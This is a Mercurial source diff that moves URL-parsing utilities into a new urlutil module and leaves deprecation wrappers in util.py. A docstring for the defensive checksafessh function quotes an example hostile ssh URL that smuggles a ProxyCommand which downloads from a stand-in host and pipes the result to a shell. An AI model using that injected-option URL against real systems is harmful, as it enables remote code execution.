-57,6 +56,7 @@ hashutil, procutil, stringutil, + urlutil, ) if pycompat.TYPE_CHECKING: @@ -65,7 +65,6 @@ List, Optional, Tuple, - Union, ) @@ -2943,420 +2942,52 @@ return r.sub(lambda x: fn(mapping[x.group()[1:]]), s) -def getport(port): - # type: (Union[bytes, int]) -> int - """Return the port for a given network service. - - If port is an integer, it's returned as is. If it's a string, it's - looked up using socket.getservbyname(). If there's no matching - service, error.Abort is raised. - """ - try: - return int(port) - except ValueError: - pass - - try: - return socket.getservbyname(pycompat.sysstr(port)) - except socket.error: - raise error.Abort( - _(b"no port number associated with service '%s'") % port - ) - - -class url(object): - r"""Reliable URL parser. - - This parses URLs and provides attributes for the following - components: - - ://:@:/?# - - Missing components are set to None. The only exception is - fragment, which is set to '' if present but empty. - - If parsefragment is False, fragment is included in query. If - parsequery is False, query is included in path. If both are - False, both fragment and query are included in path. - - See http://www.ietf.org/rfc/rfc2396.txt for more information. - - Note that for backward compatibility reasons, bundle URLs do not - take host names. That means 'bundle://../' has a path of '../'. - - Examples: - - >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') - - >>> url(b'ssh://[::1]:2200//home/joe/repo') - - >>> url(b'file:///home/joe/repo') - - >>> url(b'file:///c:/temp/foo/') - - >>> url(b'bundle:foo') - - >>> url(b'bundle://../foo') - - >>> url(br'c:\foo\bar') - - >>> url(br'\\blah\blah\blah') - - >>> url(br'\\blah\blah\blah#baz') - - >>> url(br'file:///C:\users\me') - - - Authentication credentials: - - >>> url(b'ssh://joe:xyz@x/repo') - - >>> url(b'ssh://joe@x/repo') - - - Query strings and fragments: - - >>> url(b'http://host/a?b#c') - - >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) - - - Empty path: - - >>> url(b'') - - >>> url(b'#a') - - >>> url(b'http://host/') - - >>> url(b'http://host/#a') - - - Only scheme: - - >>> url(b'http:') - - """ - - _safechars = b"!~*'()+" - _safepchars = b"/!~*'()+:\\" - _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match - - def __init__(self, path, parsequery=True, parsefragment=True): - # type: (bytes, bool, bool) -> None - # We slowly chomp away at path until we have only the path left - self.scheme = self.user = self.passwd = self.host = None - self.port = self.path = self.query = self.fragment = None - self._localpath = True - self._hostport = b'' - self._origpath = path - - if parsefragment and b'#' in path: - path, self.fragment = path.split(b'#', 1) - - # special case for Windows drive letters and UNC paths - if hasdriveletter(path) or path.startswith(b'\\\\'): - self.path = path - return - - # For compatibility reasons, we can't handle bundle paths as - # normal URLS - if path.startswith(b'bundle:'): - self.scheme = b'bundle' - path = path[7:] - if path.startswith(b'//'): - path = path[2:] - self.path = path - return - - if self._matchscheme(path): - parts = path.split(b':', 1) - if parts[0]: - self.scheme, path = parts - self._localpath = False - - if not path: - path = None - if self._localpath: - self.path = b'' - return - else: - if self._localpath: - self.path = path - return - - if parsequery and b'?' in path: - path, self.query = path.split(b'?', 1) - if not path: - path = None - if not self.query: - self.query = None - - # // is required to specify a host/authority - if path and path.startswith(b'//'): - parts = path[2:].split(b'/', 1) - if len(parts) > 1: - self.host, path = parts - else: - self.host = parts[0] - path = None - if not self.host: - self.host = None - # path of file:///d is /d - # path of file:///d:/ is d:/, not /d:/ - if path and not hasdriveletter(path): - path = b'/' + path - - if self.host and b'@' in self.host: - self.user, self.host = self.host.rsplit(b'@', 1) - if b':' in self.user: - self.user, self.passwd = self.user.split(b':', 1) - if not self.host: - self.host = None - - # Don't split on colons in IPv6 addresses without ports - if ( - self.host - and b':' in self.host - and not ( - self.host.startswith(b'[') and self.host.endswith(b']') - ) - ): - self._hostport = self.host - self.host, self.port = self.host.rsplit(b':', 1) - if not self.host: - self.host = None - - if ( - self.host - and self.scheme == b'file' - and self.host not in (b'localhost', b'127.0.0.1', b'[::1]') - ): - raise error.Abort( - _(b'file:// URLs can only refer to localhost') - ) - - self.path = path - - # leave the query string escaped - for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'): - v = getattr(self, a) - if v is not None: - setattr(self, a, urlreq.unquote(v)) - - def copy(self): - u = url(b'temporary useless value') - u.path = self.path - u.scheme = self.scheme - u.user = self.user - u.passwd = self.passwd - u.host = self.host - u.path = self.path - u.query = self.query - u.fragment = self.fragment - u._localpath = self._localpath - u._hostport = self._hostport - u._origpath = self._origpath - return u - - @encoding.strmethod - def __repr__(self): - attrs = [] - for a in ( - b'scheme', - b'user', - b'passwd', - b'host', - b'port', - b'path', - b'query', - b'fragment', - ): - v = getattr(self, a) - if v is not None: - attrs.append(b'%s: %r' % (a, pycompat.bytestr(v))) - return b'' % b', '.join(attrs) - - def __bytes__(self): - r"""Join the URL's components back into a URL string. - - Examples: - - >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) - 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' - >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) - 'http://user:pw@host:80/?foo=bar&baz=42' - >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) - 'http://user:pw@host:80/?foo=bar%3dbaz' - >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) - 'ssh://user:pw@[::1]:2200//home/joe#' - >>> bytes(url(b'http://localhost:80//')) - 'http://localhost:80//' - >>> bytes(url(b'http://localhost:80/')) - 'http://localhost:80/' - >>> bytes(url(b'http://localhost:80')) - 'http://localhost:80/' - >>> bytes(url(b'bundle:foo')) - 'bundle:foo' - >>> bytes(url(b'bundle://../foo')) - 'bundle:../foo' - >>> bytes(url(b'path')) - 'path' - >>> bytes(url(b'file:///tmp/foo/bar')) - 'file:///tmp/foo/bar' - >>> bytes(url(b'file:///c:/tmp/foo/bar')) - 'file:///c:/tmp/foo/bar' - >>> print(url(br'bundle:foo\bar')) - bundle:foo\bar - >>> print(url(br'file:///D:\data\hg')) - file:///D:\data\hg - """ - if self._localpath: - s = self.path - if self.scheme == b'bundle': - s = b'bundle:' + s - if self.fragment: - s += b'#' + self.fragment - return s - - s = self.scheme + b':' - if self.user or self.passwd or self.host: - s += b'//' - elif self.scheme and ( - not self.path - or self.path.startswith(b'/') - or hasdriveletter(self.path) - ): - s += b'//' - if hasdriveletter(self.path): - s += b'/' - if self.user: - s += urlreq.quote(self.user, safe=self._safechars) - if self.passwd: - s += b':' + urlreq.quote(self.passwd, safe=self._safechars) - if self.user or self.passwd: - s += b'@' - if self.host: - if not (self.host.startswith(b'[') and self.host.endswith(b']')): - s += urlreq.quote(self.host) - else: - s += self.host - if self.port: - s += b':' + urlreq.quote(self.port) - if self.host: - s += b'/' - if self.path: - # TODO: similar to the query string, we should not unescape the - # path when we store it, the path might contain '%2f' = '/', - # which we should *not* escape. - s += urlreq.quote(self.path, safe=self._safepchars) - if self.query: - # we store the query in escaped form. - s += b'?' + self.query - if self.fragment is not None: - s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) - return s - - __str__ = encoding.strmethod(__bytes__) - - def authinfo(self): - user, passwd = self.user, self.passwd - try: - self.user, self.passwd = None, None - s = bytes(self) - finally: - self.user, self.passwd = user, passwd - if not self.user: - return (s, None) - # authinfo[1] is passed to urllib2 password manager, and its - # URIs must not contain credentials. The host is passed in the - # URIs list because Python < 2.4.3 uses only that to search for - # a password. - return (s, (None, (s, self.host), self.user, self.passwd or b'')) - - def isabs(self): - if self.scheme and self.scheme != b'file': - return True # remote URL - if hasdriveletter(self.path): - return True # absolute for our purposes - can't be joined() - if self.path.startswith(br'\\'): - return True # Windows UNC path - if self.path.startswith(b'/'): - return True # POSIX-style - return False - - def localpath(self): - # type: () -> bytes - if self.scheme == b'file' or self.scheme == b'bundle': - path = self.path or b'/' - # For Windows, we need to promote hosts containing drive - # letters to paths with drive letters. - if hasdriveletter(self._hostport): - path = self._hostport + b'/' + self.path - elif ( - self.host is not None and self.path and not hasdriveletter(path) - ): - path = b'/' + path - return path - return self._origpath - - def islocal(self): - '''whether localpath will return something that posixfile can open''' - return ( - not self.scheme - or self.scheme == b'file' - or self.scheme == b'bundle' - ) - - -def hasscheme(path): - # type: (bytes) -> bool - return bool(url(path).scheme) # cast to help pytype - - -def hasdriveletter(path): - # type: (bytes) -> bool - return bool(path) and path[1:2] == b':' and path[0:1].isalpha() - - -def urllocalpath(path): - # type: (bytes) -> bytes - return url(path, parsequery=False, parsefragment=False).localpath() - - -def checksafessh(path): - # type: (bytes) -> None - """check if a path / url is a potentially unsafe ssh exploit (SEC) - - This is a sanity check for ssh urls. ssh will parse the first item as - an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. - Let's prevent these potentially exploited urls entirely and warn the - user. - - Raises an error.Abort when the url is unsafe. - """ - path = urlreq.unquote(path) - if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): - raise error.Abort( - _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) - ) - - -def hidepassword(u): - # type: (bytes) -> bytes - '''hide user credential in a url string''' - u = url(u) - if u.passwd: - u.passwd = b'***' - return bytes(u) - - -def removeauth(u): - # type: (bytes) -> bytes - '''remove all authentication information from a url string''' - u = url(u) - u.user = u.passwd = None - return bytes(u) +def getport(*args, **kwargs): + msg = b'getport(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.getport(*args, **kwargs) + + +def url(*args, **kwargs): + msg = b'url(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.url(*args, **kwargs) + + +def hasscheme(*args, **kwargs): + msg = b'hasscheme(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hasscheme(*args, **kwargs) + + +def hasdriveletter(*args, **kwargs): + msg = b'hasdriveletter(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hasdriveletter(*args, **kwargs) + + +def urllocalpath(*args, **kwargs): + msg = b'urllocalpath(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.urllocalpath(*args, **kwargs) + + +def checksafessh(*args, **kwargs): + msg = b'checksafessh(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.checksafessh(*args, **kwargs) + + +def hidepassword(*args, **kwargs): + msg = b'hidepassword(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hidepassword(*args, **kwargs) + + +def removeauth(*args, **kwargs): + msg = b'removeauth(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.removeauth(*args, **kwargs) timecount = unitcountfn( diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -5,6 +5,8 @@ # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. import os +import re as remod +import socket from ..i18n import _ from ..pycompat import ( @@ -12,12 +14,437 @@ setattr, ) from .. import ( + encoding, error, pycompat, - util, + urllibcompat, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Union, + ) + +urlreq = urllibcompat.urlreq + + +def getport(port): + # type: (Union[bytes, int]) -> int + """Return the port for a given network service. + + If port is an integer, it's returned as is. If it's a string, it's + looked up using socket.getservbyname(). If there's no matching + service, error.Abort is raised. + """ + try: + return int(port) + except ValueError: + pass + + try: + return socket.getservbyname(pycompat.sysstr(port)) + except socket.error: + raise error.Abort( + _(b"no port number associated with service '%s'") % port + ) + + +class url(object): + r"""Reliable URL parser. + + This parses URLs and provides attributes for the following + components: + + ://:@:/?# + + Missing components are set to None. The only exception is + fragment, which is set to '' if present but empty. + + If parsefragment is False, fragment is included in query. If + parsequery is False, query is included in path. If both are + False, both fragment and query are included in path. + + See http://www.ietf.org/rfc/rfc2396.txt for more information. + + Note that for backward compatibility reasons, bundle URLs do not + take host names. That means 'bundle://../' has a path of '../'. + + Examples: + + >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') + + >>> url(b'ssh://[::1]:2200//home/joe/repo') + + >>> url(b'file:///home/joe/repo') + + >>> url(b'file:///c:/temp/foo/') + + >>> url(b'bundle:foo') + + >>> url(b'bundle://../foo') + + >>> url(br'c:\foo\bar') + + >>> url(br'\\blah\blah\blah') + + >>> url(br'\\blah\blah\blah#baz') + + >>> url(br'file:///C:\users\me') + + + Authentication credentials: + + >>> url(b'ssh://joe:xyz@x/repo') + + >>> url(b'ssh://joe@x/repo') + + + Query strings and fragments: + + >>> url(b'http://host/a?b#c') + + >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) + + + Empty path: + + >>> url(b'') + + >>> url(b'#a') + + >>> url(b'http://host/') + + >>> url(b'http://host/#a') + + + Only scheme: + + >>> url(b'http:') + + """ + + _safechars = b"!~*'()+" + _safepchars = b"/!~*'()+:\\" + _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match + + def __init__(self, path, parsequery=True, parsefragment=True): + # type: (bytes, bool, bool) -> None + # We slowly chomp away at path until we have only the path left + self.scheme = self.user = self.passwd = self.host = None + self.port = self.path = self.query = self.fragment = None + self._localpath = True + self._hostport = b'' + self._origpath = path + + if parsefragment and b'#' in path: + path, self.fragment = path.split(b'#', 1) + + # special case for Windows drive letters and UNC paths + if hasdriveletter(path) or path.startswith(b'\\\\'): + self.path = path + return + + # For compatibility reasons, we can't handle bundle paths as + # normal URLS + if path.startswith(b'bundle:'): + self.scheme = b'bundle' + path = path[7:] + if path.startswith(b'//'): + path = path[2:] + self.path = path + return + + if self._matchscheme(path): + parts = path.split(b':', 1) + if parts[0]: + self.scheme, path = parts + self._localpath = False + + if not path: + path = None + if self._localpath: + self.path = b'' + return + else: + if self._localpath: + self.path = path + return + + if parsequery and b'?' in path: + path, self.query = path.split(b'?', 1) + if not path: + path = None + if not self.query: + self.query = None + + # // is required to specify a host/authority + if path and path.startswith(b'//'): + parts = path[2:].split(b'/', 1) + if len(parts) > 1: + self.host, path = parts + else: + self.host = parts[0] + path = None + if not self.host: + self.host = None + # path of file:///d is /d + # path of file:///d:/ is d:/, not /d:/ + if path and not hasdriveletter(path): + path = b'/' + path + + if self.host and b'@' in self.host: + self.user, self.host = self.host.rsplit(b'@', 1) + if b':' in self.user: + self.user, self.passwd = self.user.split(b':', 1) + if not self.host: + self.host = None + + # Don't split on colons in IPv6 addresses without ports + if ( + self.host + and b':' in self.host + and not ( + self.host.startswith(b'[') and self.host.endswith(b']') + ) + ): + self._hostport = self.host + self.host, self.port = self.host.rsplit(b':', 1) + if not self.host: + self.host = None + + if ( + self.host + and self.scheme == b'file' + and self.host not in (b'localhost', b'127.0.0.1', b'[::1]') + ): + raise error.Abort( + _(b'file:// URLs can only refer to localhost') + ) + + self.path = path + + # leave the query string escaped + for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'): + v = getattr(self, a) + if v is not None: + setattr(self, a, urlreq.unquote(v)) + + def copy(self): + u = url(b'temporary useless value') + u.path = self.path + u.scheme = self.scheme + u.user = self.user + u.passwd = self.passwd + u.host = self.host + u.path = self.path + u.query = self.query + u.fragment = self.fragment + u._localpath = self._localpath + u._hostport = self._hostport + u._origpath = self._origpath + return u + + @encoding.strmethod + def __repr__(self): + attrs = [] + for a in ( + b'scheme', + b'user', + b'passwd', + b'host', + b'port', + b'path', + b'query', + b'fragment', + ): + v = getattr(self, a) + if v is not None: + attrs.append(b'%s: %r' % (a, pycompat.bytestr(v))) + return b'' % b', '.join(attrs) + + def __bytes__(self): + r"""Join the URL's components back into a URL string. + + Examples: + + >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) + 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' + >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) + 'http://user:pw@host:80/?foo=bar&baz=42' + >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) + 'http://user:pw@host:80/?foo=bar%3dbaz' + >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) + 'ssh://user:pw@[::1]:2200//home/joe#' + >>> bytes(url(b'http://localhost:80//')) + 'http://localhost:80//' + >>> bytes(url(b'http://localhost:80/')) + 'http://localhost:80/' + >>> bytes(url(b'http://localhost:80')) + 'http://localhost:80/' + >>> bytes(url(b'bundle:foo')) + 'bundle:foo' + >>> bytes(url(b'bundle://../foo')) + 'bundle:../foo' + >>> bytes(url(b'path')) + 'path' + >>> bytes(url(b'file:///tmp/foo/bar')) + 'file:///tmp/foo/bar' + >>> bytes(url(b'file:///c:/tmp/foo/bar')) + 'file:///c:/tmp/foo/bar' + >>> print(url(br'bundle:foo\bar')) + bundle:foo\bar + >>> print(url(br'file:///D:\data\hg')) + file:///D:\data\hg + """ + if self._localpath: + s = self.path + if self.scheme == b'bundle': + s = b'bundle:' + s + if self.fragment: + s += b'#' + self.fragment + return s + + s = self.scheme + b':' + if self.user or self.passwd or self.host: + s += b'//' + elif self.scheme and ( + not self.path + or self.path.startswith(b'/') + or hasdriveletter(self.path) + ): + s += b'//' + if hasdriveletter(self.path): + s += b'/' + if self.user: + s += urlreq.quote(self.user, safe=self._safechars) + if self.passwd: + s += b':' + urlreq.quote(self.passwd, safe=self._safechars) + if self.user or self.passwd: + s += b'@' + if self.host: + if not (self.host.startswith(b'[') and self.host.endswith(b']')): + s += urlreq.quote(self.host) + else: + s += self.host + if self.port: + s += b':' + urlreq.quote(self.port) + if self.host: + s += b'/' + if self.path: + # TODO: similar to the query string, we should not unescape the + # path when we store it, the path might contain '%2f' = '/', + # which we should *not* escape. + s += urlreq.quote(self.path, safe=self._safepchars) + if self.query: + # we store the query in escaped form. + s += b'?' + self.query + if self.fragment is not None: + s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) + return s + + __str__ = encoding.strmethod(__bytes__) + + def authinfo(self): + user, passwd = self.user, self.passwd + try: + self.user, self.passwd = None, None + s = bytes(self) + finally: + self.user, self.passwd = user, passwd + if not self.user: + return (s, None) + # authinfo[1] is passed to urllib2 password manager, and its + # URIs must not contain credentials. The host is passed in the + # URIs list because Python < 2.4.3 uses only that to search for + # a password. + return (s, (None, (s, self.host), self.user, self.passwd or b'')) + + def isabs(self): + if self.scheme and self.scheme != b'file': + return True # remote URL + if hasdriveletter(self.path): + return True # absolute for our purposes - can't be joined() + if self.path.startswith(br'\\'): + return True # Windows UNC path + if self.path.startswith(b'/'): + return True # POSIX-style + return False + + def localpath(self): + # type: () -> bytes + if self.scheme == b'file' or self.scheme == b'bundle': + path = self.path or b'/' + # For Windows, we need to promote hosts containing drive + # letters to paths with drive letters. + if hasdriveletter(self._hostport): + path = self._hostport + b'/' + self.path + elif ( + self.host is not None and self.path and not hasdriveletter(path) + ): + path = b'/' + path + return path + return self._origpath + + def islocal(self): + '''whether localpath will return something that posixfile can open''' + return ( + not self.scheme + or self.scheme == b'file' + or self.scheme == b'bundle' + ) + + +def hasscheme(path): + # type: (bytes) -> bool + return bool(url(path).scheme) # cast to help pytype + + +def hasdriveletter(path): + # type: (bytes) -> bool + return bool(path) and path[1:2] == b':' and path[0:1].isalpha() + + +def urllocalpath(path): + # type: (bytes) -> bytes + return url(path, parsequery=False, parsefragment=False).localpath() + + +def checksafessh(path): + # type: (bytes) -> None + """check if a path / url is a potentially unsafe ssh exploit (SEC) + + This is a sanity check for ssh urls. ssh will parse the first item as + an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. + Let's prevent these potentially exploited urls entirely and warn the + user. + + Raises an error.Abort when the url is unsafe. + """ + path = urlreq.unquote(path) + if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): + raise error.Abort( + _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) + ) + + +def hidepassword(u): + # type: (bytes) -> bytes + '''hide user credential in a url string''' + u = url(u) + if u.passwd: + u.passwd = b'***' + return bytes(u) + + +def removeauth(u): + # type: (bytes) -> bytes + '''remove all authentication information from a url string''' + u = url(u) + u.user = u.passwd = None + return bytes(u) + + class paths(dict): """Represents a collection of paths and their configs. @@ -103,7 +530,7 @@ @pathsuboption(b'pushurl', b'pushloc') def pushurlpathoption(ui, path, value): - u = util.url(value) + u = url(value) # Actually require a URL. if not u.scheme: ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) @@ -148,7 +575,7 @@ raise ValueError(b'rawloc must be defined') # Locations may define branches via syntax #. - u = util.url(rawloc) + u = url(rawloc) branch = None if u.fragment: branch = u.fragment diff --git a/tests/test-doctest.py b/tests/test-doctest.py --- a/tests/test-doctest.py +++ b/tests/test-doctest.py @@ -158,6 +158,7 @@ ('mercurial.util', '{}'), ('mercurial.utils.dateutil', '{}'), ('mercurial.utils.stringutil', '{}'), + ('mercurial.utils.urlutil', '{}'), ('tests.drawdag', '{}'), ('tests.test-run-tests', '{}'), ('tests.test-url', "{'optionflags': 4}"), diff --git a/tests/test-hgweb-auth.py b/tests/test-hgweb-auth.py --- a/tests/test-hgweb-auth.py +++ b/tests/test-hgweb-auth.py @@ -10,7 +10,10 @@ url, util, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) urlerr = util.urlerr urlreq = util.urlreq @@ -60,7 +63,7 @@ print('URI:', pycompat.strurl(uri)) try: pm = url.passwordmgr(ui, urlreq.httppasswordmgrwithdefaultrealm()) - u, authinfo = util.url(uri).authinfo() + u, authinfo = urlutil.url(uri).authinfo() if authinfo is not None: pm.add_password(*_stringifyauthinfo(authinfo)) print( @@ -198,10 +201,12 @@ def testauthinfo(fullurl, authurl): print('URIs:', fullurl, authurl) pm = urlreq.httppasswordmgrwithdefaultrealm() - ai = _stringifyauthinfo(util.url(pycompat.bytesurl(fullurl)).authinfo()[1]) + ai = _stringifyauthinfo( + urlutil.url(pycompat.bytesurl(fullurl)).authinfo()[1] + ) pm.add_password(*ai) print(pm.find_user_password('test', authurl)) -print('\n*** Test urllib2 and util.url\n') +print('\n*** Test urllib2 and urlutil.url\n') testauthinfo('http://user@example.com:8080/foo', 'http://example.com:8080/foo') diff --git a/tests/test-hgweb-auth.py.out b/tests/test-hgweb-auth.py.out --- a/tests/test-hgweb-auth.py.out +++ b/tests/test-hgweb-auth.py.out @@ -211,7 +211,7 @@ URI: http://example.org/foo abort -*** Test urllib2 and util.url +*** Test urllib2 and urlutil.url URIs: http://user@example.com:8080/foo http://example.com:8080/foo ('user', '') diff --git a/tests/test-url.py b/tests/test-url.py --- a/tests/test-url.py +++ b/tests/test-url.py @@ -275,7 +275,7 @@ def test_url(): """ >>> from mercurial import error, pycompat - >>> from mercurial.util import url + >>> from mercurial.utils.urlutil import url >>> from mercurial.utils.stringutil import forcebytestr This tests for edge cases in url.URL's parsing algorithm. Most of